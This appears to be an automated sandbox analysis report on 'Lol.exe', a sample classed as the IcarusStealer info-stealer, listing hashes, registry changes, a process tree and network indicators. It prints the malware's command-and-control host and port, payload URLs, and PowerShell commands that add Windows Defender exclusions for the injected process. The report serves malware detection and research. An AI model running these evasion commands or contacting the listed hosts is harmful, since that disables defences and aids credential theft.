Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
08/03/2024, 20:56
Static task
static1
Behavioral task
behavioral1
Sample
Lol.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Lol.exe
Resource
win10v2004-20231215-en
General
-
Target
Lol.exe
-
Size
494KB
-
MD5
c0e9809fcc4b0347e9257a16d71eeecb
-
SHA1
45dd5e7f29e2939de5fb6bd7efe1cf59b6170dd7
-
SHA256
723eff54d04dabd806c06190b582ccaba96836d923ce2d49fef537ba3568669a
-
SHA512
a24ee93e7978f5075fed12c04e1100e94123df5f11c7e4e81821ac929a411e0a39b86248d1fb6bd89e09cb8835351cd2e06911041aea1c8ba34c75d274a21ba6
-
SSDEEP
12288:uX4axuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+Qq:uX5/6N6LqQzJqkd
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Executes dropped EXE 1 IoCs
pid Process 2792 YourPhone.exe -
Loads dropped DLL 1 IoCs
pid Process 2660 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 raw.githubusercontent.com 3 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2104 set thread context of 2640 2104 Lol.exe 32 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Lol.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Lol.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2104 Lol.exe 2792 YourPhone.exe 1612 powershell.exe 2408 powershell.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe 2792 YourPhone.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 2104 Lol.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeDebugPrivilege 2640 cvtres.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeDebugPrivilege 2792 YourPhone.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeShutdownPrivilege 2628 explorer.exe Token: SeShutdownPrivilege 2628 explorer.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe 2628 explorer.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2104 wrote to memory of 3052 2104 Lol.exe 29 PID 2104 wrote to memory of 3052 2104 Lol.exe 29 PID 2104 wrote to memory of 3052 2104 Lol.exe 29 PID 2104 wrote to memory of 3052 2104 Lol.exe 29 PID 3052 wrote to memory of 2544 3052 csc.exe 30 PID 3052 wrote to memory of 2544 3052 csc.exe 30 PID 3052 wrote to memory of 2544 3052 csc.exe 30 PID 3052 wrote to memory of 2544 3052 csc.exe 30 PID 2104 wrote to memory of 2628 2104 Lol.exe 31 PID 2104 wrote to memory of 2628 2104 Lol.exe 31 PID 2104 wrote to memory of 2628 2104 Lol.exe 31 PID 2104 wrote to memory of 2628 2104 Lol.exe 31 PID 2104 wrote to memory of 2640 2104 Lol.exe 32 PID 2104 wrote to memory of 2640 2104 Lol.exe 32 PID 2104 wrote to memory of 2640 2104 Lol.exe 32 PID 2104 wrote to memory of 2640 2104 Lol.exe 32 PID 2104 wrote to memory of 2660 2104 Lol.exe 33 PID 2104 wrote to memory of 2660 2104 Lol.exe 33 PID 2104 wrote to memory of 2660 2104 Lol.exe 33 PID 2104 wrote to memory of 2660 2104 Lol.exe 33 PID 2104 wrote to memory of 2640 2104 Lol.exe 32 PID 2104 wrote to memory of 2640 2104 Lol.exe 32 PID 2104 wrote to memory of 2640 2104 Lol.exe 32 PID 2104 wrote to memory of 2640 2104 Lol.exe 32 PID 2104 wrote to memory of 2640 2104 Lol.exe 32 PID 2628 wrote to memory of 2828 2628 explorer.exe 35 PID 2628 wrote to memory of 2828 2628 explorer.exe 35 PID 2628 wrote to memory of 2828 2628 explorer.exe 35 PID 2660 wrote to memory of 2792 2660 cmd.exe 36 PID 2660 wrote to memory of 2792 2660 cmd.exe 36 PID 2660 wrote to memory of 2792 2660 cmd.exe 36 PID 2660 wrote to memory of 2792 2660 cmd.exe 36 PID 2640 wrote to memory of 2456 2640 cvtres.exe 37 PID 2640 wrote to memory of 2456 2640 cvtres.exe 37 PID 2640 wrote to memory of 2456 2640 cvtres.exe 37 PID 2640 wrote to memory of 2456 2640 cvtres.exe 37 PID 2640 wrote to memory of 2560 2640 cvtres.exe 39 PID 2640 wrote to memory of 2560 2640 cvtres.exe 39 PID 2640 wrote to memory of 2560 2640 cvtres.exe 39 PID 2640 wrote to memory of 2560 2640 cvtres.exe 39 PID 2456 wrote to memory of 1612 2456 cmd.exe 41 PID 2456 wrote to memory of 1612 2456 cmd.exe 41 PID 2456 wrote to memory of 1612 2456 cmd.exe 41 PID 2456 wrote to memory of 1612 2456 cmd.exe 41 PID 2560 wrote to memory of 2408 2560 cmd.exe 42 PID 2560 wrote to memory of 2408 2560 cmd.exe 42 PID 2560 wrote to memory of 2408 2560 cmd.exe 42 PID 2560 wrote to memory of 2408 2560 cmd.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Lol.exe"C:\Users\Admin\AppData\Local\Temp\Lol.exe"1⤵
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hylhgso0\hylhgso0.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES255C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDC6D8061E3744D31B2C7C51C165B61B4.TMP"3⤵PID:2544
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2828
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client should-nutritional.gl.at.ply.gg 22817 PUGlcQLxe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\YourPhone.exeC:\Users\Admin\AppData\Local\Temp\YourPhone.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD502a2c20a12668d1e02818a538531baf6
SHA1bb3d70370299d5f8dd645a04432b9112ee37f346
SHA256fbfd7ef08db5341c6530aa25fd1c36f8654fae5763a33856d4c148c7e9c8bce1
SHA512d2609f2ad2ccec024d4bbbf5bd7f35f8617e7c05693bd14eebf6dafcceecb93872df1ee6a4eedf16610a05ae64da5301cdeb763d18cfd8079be9aa8027c97ca3
-
Filesize
4KB
MD562d8c5c0cd96d8c04e90c85a8a428101
SHA15fbe149191aa532abb93c2046a42701f8c58dae4
SHA2560fc29b26d73df89b3a99e7846a5774f33685bba32f77b18b99052f53795ba8c8
SHA512fb2c2d02c497aa121dd6aecb880be09dc83e470611f2eed91bd2640cfe97d2a2d180be0b77cdaf27f41589ed5144afd25687875b4345aaa0d7560fd930806297
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DRL6692GL0CRUT87L7U4.temp
Filesize7KB
MD5f32896ce3eac43e2e6032ae6bdbeffb2
SHA1adccbcbdbf0106b9d8eb434c3deec89988db6952
SHA2560807782619efb4c55e7ccf5226ad23542d850d791c7958dc12b2324a27a780ec
SHA51225645584e2a23069edbe74f3d40115bbebf5eaff73a7bfe2bee1eb956f22a6d6f871411e937398dfb457b64297fe9ee59a7409a03f9aa507aedb0d4745be0fa5
-
Filesize
10B
MD5d95d8b94c86f2ef698f4d328e80f7e5a
SHA121b2774d2a18adafa0b3fe00d48499173a9e9a4f
SHA256fedacc2623edabe3a3be2a96543fd78ca0712dffad4258d6e52b9757cb2bcfb5
SHA512e9401fc5e7c3daf0c5474c17f3d5795fc800d676ce34fb854df5f87867ccb0c086e94232d865c73aba9b1995a74aeb2a9aeb9b1053310e6167bdf17ca8b6c7e6
-
Filesize
1KB
MD51d5543c367c49b9dd6366270fdd4ee3a
SHA1bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66
SHA256502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2
SHA51286c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
451B
MD509d4efbcf6aafd2e3ed25d699e71d048
SHA1b2d19d50aeae475f18f7dfc967d7efa088b9cca0
SHA256dff2c1dd9bed6e2d7f32fd867481fcb828ddabc9f8ec97e08439d7dff777ae59
SHA5129f4b247b3b24775726676a18174460af1a284843edb796745fbe9cf5f840097362246a7b908e554a7f6b9f1dc4819fefd78d14689b8cbfd5c6f9cd8738af095b